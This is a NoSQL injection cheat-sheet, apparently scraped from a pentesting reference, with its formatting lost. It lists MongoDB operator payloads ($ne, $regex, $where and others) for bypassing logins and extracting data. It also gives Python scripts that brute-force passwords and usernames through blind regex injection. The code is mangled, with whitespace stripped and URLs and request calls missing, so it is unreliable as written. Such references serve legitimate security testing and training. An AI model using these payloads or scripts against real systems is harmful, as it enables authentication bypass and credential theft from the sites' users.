In PHP you can send an Array changing the sent parameter from parameter=foo to parameter[arrName]=foo.
The exploits are based in adding an Operator:
username[$ne]=1$password[$ne]=1 #<Not Equals>username[$regex]=^adm$password[$ne]=1 #Check a <regular expression>, could be used to brute-force a parameterusername[$regex]=.{25}&pass[$ne]=1#Use the <regex> to find the length of a valueusername[$eq]=admin&password[$ne]=1#<Equals>username[$ne]=admin&pass[$lt]=s#<Less than>, Brute-force pass[$lt] to find more usersusername[$ne]=admin&pass[$gt]=s#<Greater Than>username[$nin][admin]=admin&username[$nin][test]=test&pass[$ne]=7#<Matches non of the values of the array> (not test and not admin){ $where:"this.credits == this.debits"}#<IF>,canbeusedtoexecutecode
An attacker can exploit this by inputting strings like admin' || 'a'=='a, making the query return all documents by satisfying the condition with a tautology ('a'=='a'). This is analogous to SQL injection attacks where inputs like ' or 1=1-- - are used to manipulate SQL queries. In MongoDB, similar injections can be done using inputs like ' || 1==1//, ' || 1==1%00, or admin' || 'a'=='a.
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00 or admin' || 'a'=='a
Extract length information
username[$ne]=toto&password[$regex]=.{1}username[$ne]=toto&password[$regex]=.{3}# True if the length equals 1,3...
Using the $func operator of the MongoLite library (used by default) it might be possible to execute and arbitrary function as in this report.
Get info from different collection
It's possible to use $lookup to get info from a different collection. In the following example, we are reading from a different collection called users and getting the results of all the entries with a password matching a wildcard.
NOTE:$lookup and other aggregation functions are only available if the aggregate() function was used to perform the search instead of the more common find() or findOne() functions.
import requests, stringalphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits +"_@{}-/()!\"$%=^[]:;"flag =""for i inrange(21):print("[i] Looking for char number "+str(i+1))for char in alphabet: r = requests.get("^"+flag+char)if ("<TRUE>"in r.text): flag += charprint("[+] Flag: "+flag)break
import requestsimport urllib3import stringimport urlliburllib3.disable_warnings()username="admin"password=""whileTrue:for c in string.printable:if c notin ['*','+','.','?','|']: payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}'% (username, password + c) r =, data = {'ids': payload}, verify =False)if'OK'in r.text:print("Found one more char : %s"% (password+c)) password += c
Brute-force login usernames and passwords from POST login
This is a simple script that you could modify but the previous tools can also do this task.
import requestsimport stringurl =""headers ={"Host":""}cookies ={"PHPSESSID":"s3gcsgtqre05bah2vt6tibq8lsdfk"}possible_chars =list(string.ascii_letters)+list(string.digits)+ ["\\"+c for c in string.punctuation+string.whitespace ]defget_password(username):print("Extracting password of "+username) params ={"username":username,"password[$regex]":"","login":"login"} password ="^"whileTrue:for c in possible_chars: params["password[$regex]"]= password + c +".*" pr =, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)ifint(pr.status_code)==302: password += cbreakif c == possible_chars[-1]:print("Found password "+password[1:].replace("\\", "")+" for username "+username)return password[1:].replace("\\", "")defget_usernames(prefix): usernames = [] params ={"username[$regex]":"","password[$regex]":".*"}for c in possible_chars: username ="^"+ prefix + c params["username[$regex]"]= username +".*" pr =, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)ifint(pr.status_code)==302:print(username)for user inget_usernames(prefix + c): usernames.append(user)return usernamesfor u inget_usernames(""):get_password(u)